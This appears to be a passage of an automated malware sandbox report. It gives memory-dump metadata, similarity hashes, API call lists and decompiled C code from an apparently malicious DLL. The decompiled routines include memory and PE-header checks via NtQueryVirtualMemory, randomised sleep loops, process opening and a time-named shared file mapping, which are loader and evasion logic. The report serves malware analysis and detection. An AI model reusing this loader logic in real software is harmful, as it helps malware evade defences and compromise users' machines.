    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
    • String ID:
    • API String ID: 949163717-0
    • Opcode ID: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction ID: 10b3acbe3ac6cbad06cc1ab24985ce8530a03155b276faebcad073cae3c52fba
    • Opcode Fuzzy Hash: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction Fuzzy Hash: 7A515671A00206AFEF09DFA8CC44BBF77B8FF45704F158869E614E7590EB7099448B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D502485(long _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				short* _v32;
    				void _v36;
    				void* _t57;
    				signed int _t58;
    				signed int _t61;
    				signed int _t62;
    				void* _t63;
    				signed int* _t68;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				intOrPtr _t72;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				void* _t78;
    				void _t80;
    				signed int _t81;
    				signed int _t84;
    				signed int _t86;
    				short* _t87;
    				void* _t89;
    				signed int* _t90;
    				long _t91;
    				signed int _t93;
    				signed int _t94;
    				signed int _t100;
    				signed int _t102;
    				void* _t104;
    				long _t108;
    				signed int _t110;
    
    				_t108 = _a4;
    				_t76 =  *(_t108 + 8);
    				if((_t76 & 0x00000003) != 0) {
    					L3:
    					return 0;
    				}
    				_a4 =  *[fs:0x4];
    				_v8 =  *[fs:0x8];
    				if(_t76 < _v8 || _t76 >= _a4) {
    					_t102 =  *(_t108 + 0xc);
    					__eflags = _t102 - 0xffffffff;
    					if(_t102 != 0xffffffff) {
    						_t91 = 0;
    						__eflags = 0;
    						_a4 = 0;
    						_t57 = _t76;
    						do {
    							_t80 =  *_t57;
    							__eflags = _t80 - 0xffffffff;
    							if(_t80 == 0xffffffff) {
    								goto L9;
    							}
    							__eflags = _t80 - _t91;
    							if(_t80 >= _t91) {
    								L20:
    								_t63 = 0;
    								L60:
    								return _t63;
    							}
    							L9:
    							__eflags =  *(_t57 + 4);
    							if( *(_t57 + 4) != 0) {
    								_t12 =  &_a4;
    								 *_t12 = _a4 + 1;
    								__eflags =  *_t12;
    							}
    							_t91 = _t91 + 1;
    							_t57 = _t57 + 0xc;
    							__eflags = _t91 - _t102;
    						} while (_t91 <= _t102);
    						__eflags = _a4;
    						if(_a4 == 0) {
    							L15:
    							_t81 =  *0x6d5041f8;
    							_t110 = _t76 & 0xfffff000;
    							_t58 = 0;
    							__eflags = _t81;
    							if(_t81 <= 0) {
    								L18:
    								_t104 = _t102 | 0xffffffff;
    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
    								__eflags = _t61;
    								if(_t61 < 0) {
    									_t62 = 0;
    									__eflags = 0;
    								} else {
    									_t62 = _a4;
    								}
    								__eflags = _t62;
    								if(_t62 == 0) {
    									L59:
    									_t63 = _t104;
    									goto L60;
    								} else {
    									__eflags = _v12 - 0x1000000;
    									if(_v12 != 0x1000000) {
    										goto L59;
    									}
    									__eflags = _v16 & 0x000000cc;
    									if((_v16 & 0x000000cc) == 0) {
    										L46:
    										_t63 = 1;
    										 *0x6d504240 = 1;
    										__eflags =  *0x6d504240;
    										if( *0x6d504240 != 0) {
    											goto L60;
    										}
    										_t84 =  *0x6d5041f8;
    										__eflags = _t84;
    										_t93 = _t84;
    										if(_t84 <= 0) {
    											L51:
    											__eflags = _t93;
    											if(_t93 != 0) {
    												L58:
    												 *0x6d504240 = 0;
    												goto L5;
    											}
    											_t77 = 0xf;
    											__eflags = _t84 - _t77;
    											if(_t84 <= _t77) {
    												_t77 = _t84;
    											}
    											_t94 = 0;
    											__eflags = _t77;
    											if(_t77 < 0) {
    												L56:
    												__eflags = _t84 - 0x10;
    												if(_t84 < 0x10) {
    													_t86 = _t84 + 1;
    													__eflags = _t86;
    													 *0x6d5041f8 = _t86;
    												}
    												goto L58;
    											} else {
    												do {
    													_t68 = 0x6d504200 + _t94 * 4;
    													_t94 = _t94 + 1;
    													__eflags = _t94 - _t77;
    													 *_t68 = _t110;
    													_t110 =  *_t68;
    												} while (_t94 <= _t77);
    												goto L56;
    											}
    										}
    										_t69 = 0x6d5041fc + _t84 * 4;
    										while(1) {
    											__eflags =  *_t69 - _t110;
    											if( *_t69 == _t110) {
    												goto L51;
    											}
    											_t93 = _t93 - 1;
    											_t69 = _t69 - 4;
    											__eflags = _t93;
    											if(_t93 > 0) {
    												continue;
    											}
    											goto L51;
    										}
    										goto L51;
    									}
    									_t87 = _v32;
    									__eflags =  *_t87 - 0x5a4d;
    									if( *_t87 != 0x5a4d) {
    										goto L59;
    									}
    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
    									__eflags =  *_t71 - 0x4550;
    									if( *_t71 != 0x4550) {
    										goto L59;
    									}
    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
    										goto L59;
    									}
    									_t78 = _t76 - _t87;
    									__eflags =  *((short*)(_t71 + 6));
    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
    									if( *((short*)(_t71 + 6)) <= 0) {
    										goto L59;
    									}
    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
    									__eflags = _t78 - _t72;
    									if(_t78 < _t72) {
    										goto L46;
    									}
    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
    										goto L46;
    									}
    									__eflags =  *(_t89 + 0x27) & 0x00000080;
    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
    										goto L20;
    									}
    									goto L46;
    								}
    							} else {
    								goto L16;
    							}
    							while(1) {
    								L16:
    								__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
    								if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
    									break;
    								}
    								_t58 = _t58 + 1;
    								__eflags = _t58 - _t81;
    								if(_t58 < _t81) {
    									continue;
    								}
    								goto L18;
    							}
    							__eflags = _t58;
    							if(_t58 <= 0) {
    								goto L5;
    							}
    							 *0x6d504240 = 1;
    							__eflags =  *0x6d504240;
    							if( *0x6d504240 != 0) {
    								goto L5;
    							}
    							__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
    							if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
    								L32:
    								_t100 = 0;
    								__eflags = _t58;
    								if(_t58 < 0) {
    									L34:
    									 *0x6d504240 = 0;
    									goto L5;
    								} else {
    									goto L33;
    								}
    								do {
    									L33:
    									_t90 = 0x6d504200 + _t100 * 4;
    									_t100 = _t100 + 1;
    									__eflags = _t100 - _t58;
    									 *_t90 = _t110;
    									_t110 =  *_t90;
    								} while (_t100 <= _t58);
    								goto L34;
    							}
    							_t58 = _t81 - 1;
    							__eflags = _t58;
    							if(_t58 < 0) {
    								L28:
    								__eflags = _t81 - 0x10;
    								if(_t81 < 0x10) {
    									_t81 = _t81 + 1;
    									__eflags = _t81;
    									 *0x6d5041f8 = _t81;
    								}
    								_t58 = _t81 - 1;
    								goto L32;
    							} else {
    								goto L25;
    							}
    							while(1) {
    								L25:
    								__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
    								if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
    									break;
    								}
    								_t58 = _t58 - 1;
    								__eflags = _t58;
    								if(_t58 >= 0) {
    									continue;
    								}
    								break;
    							}
    							__eflags = _t58;
    							if(__eflags >= 0) {
    								if(__eflags == 0) {
    									goto L34;
    								}
    								goto L32;
    							}
    							goto L28;
    						}
    						_t75 =  *((intOrPtr*)(_t108 - 8));
    						__eflags = _t75 - _v8;
    						if(_t75 < _v8) {
    							goto L20;
    						}
    						__eflags = _t75 - _t108;
    						if(_t75 >= _t108) {
    							goto L20;
    						}
    						goto L15;
    					}
    					L5:
    					_t63 = 1;
    					goto L60;
    				} else {
    					goto L3;
    				}
    			}

    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D502536
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryQueryVirtual
    • String ID: @BPm$@BPm$@BPm
    • API String ID: 2850889275-3677909773
    • Opcode ID: cbed2fd852487a29f10cfd2b393f1944733b3a9ad1c0e1aa1ff911b1823990be
    • Instruction ID: 8f8d27e2bf6710e8673cee77fdf6f32c98b434d462c3da90cf8dc5b8bc2dfff8
    • Opcode Fuzzy Hash: cbed2fd852487a29f10cfd2b393f1944733b3a9ad1c0e1aa1ff911b1823990be
    • Instruction Fuzzy Hash: 2061C9307046039FDB3DCE28D4A076973B5FB9A318F258869D926CBE90EB31D842CA54
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
    • String ID: )
    • API String ID: 1186856153-2427484129
    • Opcode ID: 95b9c0c6bca592ac2cc2ce73661b1f262897f743e159b3a289398929614c8b63
    • Instruction ID: 0a46b694307bdde9d70251d1ec3da140f7585d3de15aa9ade43b9ee7ea2fd84f
    • Opcode Fuzzy Hash: 95b9c0c6bca592ac2cc2ce73661b1f262897f743e159b3a289398929614c8b63
    • Instruction Fuzzy Hash: 2FC16271914329AFDF0DCFA8D894EEE7BB4EB45304F02445AE215A7A90FB74AA44CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D53469F
    • DName::operator+.LIBCMT ref: 6D5347D5
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+.LIBCMT ref: 6D534821
    • DName::operator+.LIBCMT ref: 6D534830
    • DName::operator+.LIBCMT ref: 6D53478B
      • Part of subcall function 6D535D7E: DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    • DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator=.LIBVCRUNTIME ref: 6D53499D
    • DName::DName.LIBVCRUNTIME ref: 6D5349B5
    • DName::operator+.LIBCMT ref: 6D5349C4
    • DName::operator+.LIBCMT ref: 6D5349D0
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
    • String ID:
    • API String ID: 1026175760-0
    • Opcode ID: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction ID: fbed14f6f2f0e4c33fc141a08a53d55c2028dd7eeda2cc458f26bb3f06c34589
    • Opcode Fuzzy Hash: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction Fuzzy Hash: B5C182719043259FDF18CFA8D854BEEBBF4AB4A304F02485EE149A7A80FB759A44CF50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___free_lconv_mon.LIBCMT ref: 6D54CA40
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D295
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2A7
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2B9
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2CB
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2DD
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2EF
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D301
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D313
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D325
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D337
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D349
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D35B
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D36D
    • _free.LIBCMT ref: 6D54CA35
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54CA57
    • _free.LIBCMT ref: 6D54CA6C
    • _free.LIBCMT ref: 6D54CA77
    • _free.LIBCMT ref: 6D54CA99
    • _free.LIBCMT ref: 6D54CAAC
    • _free.LIBCMT ref: 6D54CABA
    • _free.LIBCMT ref: 6D54CAC5
    • _free.LIBCMT ref: 6D54CAFD
    • _free.LIBCMT ref: 6D54CB04
    • _free.LIBCMT ref: 6D54CB21
    • _free.LIBCMT ref: 6D54CB39
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 8039dcae9693818dd6c828f4c140f81013b177681e622510f3e7a09b8f8e7157
    • Instruction ID: 21733c97084e518ad1d6756651efea1ee20c4a6a157641ffac36630447c3304e
    • Opcode Fuzzy Hash: 8039dcae9693818dd6c828f4c140f81013b177681e622510f3e7a09b8f8e7157
    • Instruction Fuzzy Hash: C13173316083429FEB299B79D844B7673E9EF80314F11C829E16AD7960DF30EE54DB12
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52EFB6
    • type_info::operator==.LIBVCRUNTIME ref: 6D52EFDD
    • ___TypeMatch.LIBVCRUNTIME ref: 6D52F0E9
    • CatchIt.LIBVCRUNTIME ref: 6D52F13E
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52F1C4
    • _UnwindNestedFrames.LIBCMT ref: 6D52F24B
    • CallUnexpected.LIBVCRUNTIME ref: 6D52F266
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4234981820-393685449
    • Opcode ID: f003bcf2b9f4bbc4589dc17fa03a8a48823bed9022b69609dc640a5abcbdd98c
    • Instruction ID: 55562c284af35b0015f2ab6a8fbda90b183cf6e7820b804b356f5a47f8800f2f
    • Opcode Fuzzy Hash: f003bcf2b9f4bbc4589dc17fa03a8a48823bed9022b69609dc640a5abcbdd98c
    • Instruction Fuzzy Hash: 7EC1D031C0420AEFCF0DCFA6E8819AEBBB5BF44314F51455AE811ABA81D731DA59CF91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D5351F2
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5351FD
    • DName::DName.LIBVCRUNTIME ref: 6D53520E
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352B3
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352D0
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352ED
    • DName::operator+.LIBCMT ref: 6D535302
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D535325
    • swprintf.LIBCMT ref: 6D535396
    • DName::operator+.LIBCMT ref: 6D5353ED
      • Part of subcall function 6D53327D: DName::DName.LIBVCRUNTIME ref: 6D5332A1
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
    • String ID:
    • API String ID: 3689813335-0
    • Opcode ID: 1d2282f7a806f64287548f30fa6f9cdcc2452110c02c403de21b20ce656e0d10
    • Instruction ID: 2696ec891d1958cc526c276b4bf5b37881bf817fcf48c6143c4ee3d5e2e1aac9
    • Opcode Fuzzy Hash: 1d2282f7a806f64287548f30fa6f9cdcc2452110c02c403de21b20ce656e0d10
    • Instruction Fuzzy Hash: D781F572D5432A9AEF0DCBA4C845BFE7778AF46305F53541AD210A3C80FB789A04CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E6D5017A7(intOrPtr _a4) {
    				char _v28;
    				struct _SYSTEMTIME _v44;
    				char _v48;
    				long _v52;
    				long _v56;
    				void* __edi;
    				long _t21;
    				int _t23;
    				long _t27;
    				long _t31;
    				intOrPtr _t39;
    				intOrPtr _t44;
    				signed int _t45;
    				void* _t50;
    				signed int _t54;
    				void* _t56;
    				intOrPtr* _t57;
    
    				_t21 = E6D50146C();
    				_v52 = _t21;
    				if(_t21 != 0) {
    					L18:
    					return _t21;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					GetSystemTime( &_v44);
    					_t23 = SwitchToThread();
    					asm("cdq");
    					_t45 = 9;
    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
    					_v56 = E6D5015A3(0, _t54);
    					Sleep(_t54 << 5);
    					_t21 = _v56;
    				} while (_t21 == 0xc);
    				if(_t21 != 0) {
    					goto L18;
    				}
    				_t27 = E6D501C12(_t45);
    				_v52 = _t27;
    				if(_t27 != 0) {
    					L16:
    					_t21 = _v52;
    					if(_t21 == 0xffffffff) {
    						_t21 = GetLastError();
    					}
    					goto L18;
    				}
    				if(_a4 != 0) {
    					L11:
    					_push(0);
    					_t56 = E6D501CA4(E6D5016EC,  &_v28);
    					if(_t56 == 0) {
    						_v56 = GetLastError();
    					} else {
    						_t31 = WaitForSingleObject(_t56, 0xffffffff);
    						_v56 = _t31;
    						if(_t31 == 0) {
    							GetExitCodeThread(_t56,  &_v56);
    						}
    						CloseHandle(_t56);
    					}
    					goto L16;
    				}
    				if(E6D501D7C(_t45,  &_v48) != 0) {
    					 *0x6d5041b8 = 0;
    					goto L11;
    				}
    				_t44 = _v48;
    				_t57 = __imp__GetLongPathNameW;
    				_t50 =  *_t57(_t44, 0, 0);
    				if(_t50 == 0) {
    					L9:
    					 *0x6d5041b8 = _t44;
    					goto L11;
    				}
    				_t15 = _t50 + 2; // 0x2
    				_t39 = E6D501C8F(_t50 + _t15);
    				 *0x6d5041b8 = _t39;
    				if(_t39 == 0) {
    					goto L9;
    				} else {
    					 *_t57(_t44, _t39, _t50);
    					E6D50136A(_t44);
    					goto L11;
    				}
    			}

    APIs
      • Part of subcall function 6D50146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D5017B8,73B763F0,00000000), ref: 6D50147B
      • Part of subcall function 6D50146C: GetVersion.KERNEL32 ref: 6D50148A
      • Part of subcall function 6D50146C: GetCurrentProcessId.KERNEL32 ref: 6D501499
      • Part of subcall function 6D50146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D5014B2
    • GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6D5017CB
    • SwitchToThread.KERNEL32 ref: 6D5017D1
      • Part of subcall function 6D5015A3: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D5015F9
      • Part of subcall function 6D5015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D5017EC), ref: 6D50168B
      • Part of subcall function 6D5015A3: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6D5016A6
    • Sleep.KERNEL32(00000000,00000000), ref: 6D5017F4
    • GetLongPathNameW.KERNEL32 ref: 6D50183C
    • GetLongPathNameW.KERNEL32 ref: 6D50185A
    • WaitForSingleObject.KERNEL32(00000000,000000FF,6D5016EC,?,00000000), ref: 6D50188C
    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6D5018A0
    • CloseHandle.KERNEL32(00000000), ref: 6D5018A7
    • GetLastError.KERNEL32(6D5016EC,?,00000000), ref: 6D5018AF
    • GetLastError.KERNEL32 ref: 6D5018C2
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
    • String ID:
    • API String ID: 2280543912-0
    • Opcode ID: 878600212151b24b2e937eaf7151ffc2e9081d882827c2898f56ca57d94135e4
    • Instruction ID: a90ba468fa551f13a5fb4f3c1d8de73baff73fd19cb43b3aefe5f46c5ff6a1ca
    • Opcode Fuzzy Hash: 878600212151b24b2e937eaf7151ffc2e9081d882827c2898f56ca57d94135e4
    • Instruction Fuzzy Hash: 5E3181718097129BEB14DF658884E6B77FCFFC6759B164E2AF564D2940E730CA008BA3
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D54333D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D543349
    • _free.LIBCMT ref: 6D543354
    • _free.LIBCMT ref: 6D54335F
    • _free.LIBCMT ref: 6D54336A
    • _free.LIBCMT ref: 6D543375
    • _free.LIBCMT ref: 6D543380
    • _free.LIBCMT ref: 6D54338B
    • _free.LIBCMT ref: 6D543396
    • _free.LIBCMT ref: 6D5433A4
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 0159f860ccebc049c4f6d727cdc37a844c96bea9f15a99d3fdaae25fade470ac
    • Instruction ID: a2543751cda50278a5c475b45aa46b3a1f3ea1b69e52c9f9049b6b34d34669f3
    • Opcode Fuzzy Hash: 0159f860ccebc049c4f6d727cdc37a844c96bea9f15a99d3fdaae25fade470ac
    • Instruction Fuzzy Hash: 8D21B676908108BFCB45DF94C884DEE7BB9AF48344F0185A6E6169B530EB71EB44DB81
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __aulldvrm
    • String ID: :$f$f$f$p$p$p
    • API String ID: 1302938615-1434680307
    • Opcode ID: b5438043afe30b06477190cf8c945b05878d2e90a1c38a98da154d21764c978b
    • Instruction ID: 42a05122d70d77dc55051bbde9d8cb4f87b0f4742a657b8a175e59242a351e66
    • Opcode Fuzzy Hash: b5438043afe30b06477190cf8c945b05878d2e90a1c38a98da154d21764c978b
    • Instruction Fuzzy Hash: FC026075A042298AEB38CFA5C8546DDB7B6FF42B14FA0C655D428FBA84D7708D84CB13
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E6D501979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
    				intOrPtr _v12;
    				struct _FILETIME* _v16;
    				short _v60;
    				struct _FILETIME* _t14;
    				intOrPtr _t15;
    				long _t18;
    				void* _t22;
    				intOrPtr _t31;
    				long _t32;
    				void* _t34;
    
    				_t31 = __edx;
    				_t14 =  &_v16;
    				GetSystemTimeAsFileTime(_t14);
    				_push(0x192);
    				_push(0x54d38000);
    				_push(_v12);
    				_push(_v16);
    				L6D502210();
    				_push(_t14);
    				_v16 = _t14;
    				_t15 =  *0x6d5041d0;
    				_push(_t15 + 0x6d50505e);
    				_push(_t15 + 0x6d505054);
    				_push(0x16);
    				_push( &_v60);
    				_v12 = _t31;
    				L6D50220A();
    				_t18 = _a4;
    				if(_t18 == 0) {
    					_t18 = 0x1000;
    				}
    				_t34 = CreateFileMappingW(0xffffffff, 0x6d5041c0, 4, 0, _t18,  &_v60);
    				if(_t34 == 0) {
    					_t32 = GetLastError();
    				} else {
    					if(_a4 != 0 || GetLastError() == 0xb7) {
    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
    						if(_t22 == 0) {
    							_t32 = GetLastError();
    							if(_t32 != 0) {
    								goto L9;
    							}
    						} else {
    							 *_a8 = _t34;
    							 *_a12 = _t22;
    							_t32 = 0;
    						}
    					} else {
    						_t32 = 2;
    						L9:
    						CloseHandle(_t34);
    					}
    				}
    				return _t32;
    			}

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?,?), ref: 6D501986
    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D50199C
    • _snwprintf.NTDLL ref: 6D5019C1
    • CreateFileMappingW.KERNEL32(000000FF,6D5041C0,00000004,00000000,?,?), ref: 6D5019E6
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D5019FD
    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6D501A11
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D501A29
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A), ref: 6D501A32
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D501A3A
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
    • String ID:
    • API String ID: 1724014008-0
    • Opcode ID: eca2ba0c1dd296400f9d68847556c0f512a64476e0668771430c5ece3bb0ca80
    • Instruction ID: ab079f7893413d372e4f7cff42b988109628a2fe1d8d99388dc526d70c074c89
    • Opcode Fuzzy Hash: eca2ba0c1dd296400f9d68847556c0f512a64476e0668771430c5ece3bb0ca80
    • Instruction Fuzzy Hash: 6C21B0B2500109FFEF15AFA8CC84FAE77BCEB49359F118429FA11D7940D73099418BA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 17fce2d0229bb16b0366a55caf400d992325c04725859126cb095ce1f33e8906
    • Instruction ID: b0148fd6d870f852d17cd6a71daf098ccb32e60f49ea483b7a5fc2cd467fb2ec
    • Opcode Fuzzy Hash: 17fce2d0229bb16b0366a55caf400d992325c04725859126cb095ce1f33e8906
    • Instruction Fuzzy Hash: FBE13B75E0421A9FCB18CFA8C8809EEFBF5EF88314B15856AD915E7740E731AE418B91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    • _free.LIBCMT ref: 6D54543D
    • _free.LIBCMT ref: 6D545456
    • _free.LIBCMT ref: 6D545494
    • _free.LIBCMT ref: 6D54549D
    • _free.LIBCMT ref: 6D5454A9
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorLast
    • String ID: C
    • API String ID: 3291180501-1037565863
    • Opcode ID: be1bed58258b06fb7847166b4753fb834d20d489f78662fcd06f3d87824dda0a
    • Instruction ID: 221bbbe7e6ddbc3bada16b3dcbc9113a2cecc7408e0312fcb30422995fd90e62
